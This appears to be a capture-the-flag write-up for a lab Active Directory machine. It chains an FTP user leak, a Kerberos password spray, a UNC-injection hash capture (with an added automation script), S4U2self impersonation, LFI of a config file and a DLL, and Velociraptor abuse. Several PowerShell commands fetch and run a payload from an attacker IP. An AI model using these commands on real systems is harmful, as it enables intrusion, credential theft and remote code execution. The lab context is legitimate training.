Enumeration

sudo nmap -sC -sV -oA 10.10.119.13 -vv 10.10.119.13 -Pn

Nmap Scan Results

Port 21

  • FTP anonymous login
ftp anonymous@10.10.119.13

FTP anonymous access allowed

  • Disable Anonymous Access to the FTP Share.

  • We found some shares.

Folders that can be accessed anonymously

  • We found a list of users in the Homes directory

Users found

  • Found a draft file in ITSEC directory

audit_draft.txt file found

  • The file gave us some useful insights:

File Content of audit draft

  • NTLM authentication is disabled, so we need to use Kerberos authentication.

  • SMB signing and LDAP channel binding are enabled, so relay attacks will not work here.

  • The Kerberoasting and SeImpersonate findings are marked as fixed.

  • The "Weak User Passwords" finding is still open. We could try a password spray against the users we found on the FTP share.

Port 445

As NTLM authentication is disabled we need to use Kerberos authentication.

  • We made the necessary changes to krb5.conf (realm LUSTROUS2.VL, KDC lus2dc.lustrous2.vl) and to the hosts file (pointing lus2dc.lustrous2.vl at 10.10.119.13). Kerberos also needs our clock to be within a few minutes of the DC's.
nxc smb LUS2DC -u 'clean_users.txt' -p 'clean_users.txt' -d lustrous2.vl -k --no-bruteforce
  • No user has their username as their password.
  • Let's build a password list for spraying.
vim wordlist.txt
Spring
Fall
Autumn
Winter
Summer
Lustrous
lustrous
for i in $(cat wordlist.txt);do echo $i;echo ${i}2022;echo ${i}2023;echo ${i}2024;done > t
vim append_exclamation.rule
:
$!
$@
hashcat --force t -r append_exclamation.rule --stdout > hashcat_words.txt

  • Spraying that list produced a different Kerberos error message for one user

    Different message for Thomas.Myers

  • Let's try to get a TGT for this user

kinit Thomas.Myers

Got TGT for the user

  • We are not able to use the TGT with NetExec to access SMB or LDAP.

Port 80

  • We try accessing the website on port 80
  • HTTP requires Kerberos (Negotiate) authentication; with the TGT in our ccache:
curl http://lus2dc.lustrous2.vl -u:Thomas.Myers --negotiate -I

Firefox kerberos settings

network.negotiate-auth.delegation-uris: lus2dc.lustrous2.vl
network.negotiate-auth.trusted-uris: lus2dc.lustrous2.vl
network.negotiate-auth.using-native-gsslib: true

  • We found an audit.txt file, which is the same file we found on the FTP share.

Possible LFI

UNC Path Injection

sudo /home/user/.local/bin/smbserver.py share shared -smb2support
curl 'http://lus2dc.lustrous2.vl/File/Download?fileName=\\10.8.2.41\shared\test' -u:Thomas.Myers --negotiate -I

Got the Hash for a Service User

vim hash
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
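The UNC path injection and capture above, driven end to end as an added script (not part of the original notes). It starts impacket's smbserver.py in the background, fires the coercing request with our Kerberos ticket, and pulls the NetNTLMv2 line out of the server log into hashcat's -m 5600 format. The attacker IP, endpoint and hostnames are the ones in the notes; the sample log below is constructed, with placeholder hex values rather than a real capture. Note that the NTLM restriction the audit describes covers inbound authentication to the DC; the web server's own SMB client still authenticated to our share with NTLM.

```shell
#!/usr/bin/env bash
# Added example: UNC path coercion + NetNTLMv2 capture/parsing.
# Assumes: smbserver.py (impacket) and hashcat on PATH, attacker IP 10.8.2.41,
# and a valid ccache for Thomas.Myers in KRB5CCNAME.

LOG=smbserver.log

# Start the SMB server and log its output; on authentication it prints the hash as
# "[*] user::DOMAIN:challenge:ntproofstr:blob", which is already hashcat 5600 format.
start_capture() {
  sudo smbserver.py share "$(mktemp -d)" -smb2support > "$LOG" 2>&1 &
  echo $! > smbserver.pid
  sleep 2
}

# Make the app open a UNC path. Single quotes keep the backslashes intact;
# "-u :" tells curl to use the ticket from KRB5CCNAME via SPNEGO.
trigger() {             # usage: trigger <attacker_ip>
  curl -s -o /dev/null \
    'http://lus2dc.lustrous2.vl/File/Download?fileName=\\'"$1"'\shared\test' \
    -u : --negotiate
}

# Keep only NetNTLMv2 lines, drop the "[*] " prefix, de-duplicate.
extract_netntlmv2() {   # reads the smbserver log on stdin
  grep -E '^\[\*\] [^:]+::[^:]+:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]+' \
    | sed 's/^\[\*\] //' | sort -u
}

# NetNTLMv2 is hashcat mode 5600; --show prints cracked entries afterwards.
crack() {               # usage: crack <hashfile>
  hashcat -m 5600 "$1" /usr/share/wordlists/rockyou.txt
  hashcat -m 5600 "$1" --show
}

# Constructed sample log (placeholder hex, not a real capture) to show the parsing.
SAMPLE_LOG='[*] Incoming connection (10.10.119.13,49735)
[*] AUTHENTICATE_MESSAGE (LUSTROUS2\ShareSvc,LUS2DC)
[*] User LUS2DC\ShareSvc authenticated successfully
[*] ShareSvc::LUSTROUS2:aaaaaaaaaaaaaaaa:11111111111111111111111111111111:0101000000000000
[*] Disconnecting Share(1:IPC$)'

printf '%s\n' "$SAMPLE_LOG" | extract_netntlmv2 > sample_hash

# Live run on the attack box:
#   start_capture; trigger 10.8.2.41; sleep 5
#   extract_netntlmv2 < "$LOG" > hash; crack hash; sudo kill "$(cat smbserver.pid)"
```

If nothing lands in the log, check that the share name in the URL matches the one smbserver.py was started with and that the web server can actually reach your IP on 445.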

Hash Cracked

Cracked Password

bloodhound-python --zip -c All -d lustrous2.vl -u Thomas.myers@lustrous2.vl -dc lus2dc.lustrous2.vl --auth-method kerberos -ns 10.10.119.13 --use-ldaps

Checking AD groups in BloodHound, we can see a group called "ShareAdmins". It's safe to assume these are the admins of the file sharing web application. This group is a member of the "Protected Users" group, which means its members can't easily be impersonated with techniques like Silver Tickets or delegation.

One technique that bypasses this restriction is S4U2self. The S4U2self Kerberos extension lets a service account request a service ticket to itself on behalf of an arbitrary principal, and with getST.py's -altservice the ticket can be rewritten for the HTTP service on the same host.

To perform the attack, we grab the latest getST.py, get a TGT for the service user and then impersonate one of the share admins, here Ryan.Davies:

kinit ShareSvc
curl http://lus2dc.lustrous2.vl -u: --negotiate -v
getST.py -self -impersonate "Ryan.Davies" -k -no-pass lustrous2.vl/ShareSvc -altservice HTTP/lus2dc.lustrous2.vl
export KRB5CCNAME=Ryan.Davies@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache
firefox

  • Looking at the source code of the Upload page we found a link to a debug page.

Hidden Page found

  • Visiting the page shows a Run Command function, but running a command requires a PIN. Let's use the LFI to see where the PIN is stored.
curl 'http://lus2dc.lustrous2.vl/File/Download?fileName=..\..\web.config' -u: --negotiate

A new file found

curl 'http://lus2dc.lustrous2.vl/File/Download?fileName=..\..\LuShare.dll' -u: --negotiate --output LuShare.dll  
  • Open the DLL in CodemerxDecompile
/opt/tools/CodemerxDecompile/CodemerxDecompile  

Pin Found

ba45c518
  • We go back to the debug functionality and upload our Sliver payload (same approach as on the Retro2 machine).
iwr http://10.8.2.41/sharp.ps1 -OutFile sharp2.ps1
powershell ./sharp2.ps1

got a callback

VL{636d8f0a348196f1c939d33bedc5e0e8}

Velociraptor Privilege Escalation

  • First check whether server.config.yaml in the server folder contains the private key. If it does, generate an API client config with the administrator role:
./velociraptor-v0.72.4-windows-amd64.exe --config server.config.yaml config api_client --name admin --role administrator C:\Temp\api.config.yaml
  • With the config file created, check the permissions of the new client
./velociraptor-v0.72.4-windows-amd64.exe --config server.config.yaml acl show admin
  • Check that we can run normal VQL queries
./velociraptor-v0.72.4-windows-amd64.exe --api_config C:\Temp\api.config.yaml query "SELECT * FROM info()"
  • Run PowerShell through the execve() plugin to fetch and launch the payload for a shell
./velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['Powershell','-ExecutionPolicy','unrestricted','-c','iwr http://10.8.2.41/sharp.ps1 -OutFile C:\Temp\sharp.ps1'])"
./velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['Powershell','-ExecutionPolicy','bypass','-c','C:\Temp\sharp.ps1'])"

VL{948164bdc2e92cc1eeb5699bbde09fa1}

https://api.vulnlab.com/api/v1/share?id=a90d6534-c1e7-4313-af86-f3d8cdc92e47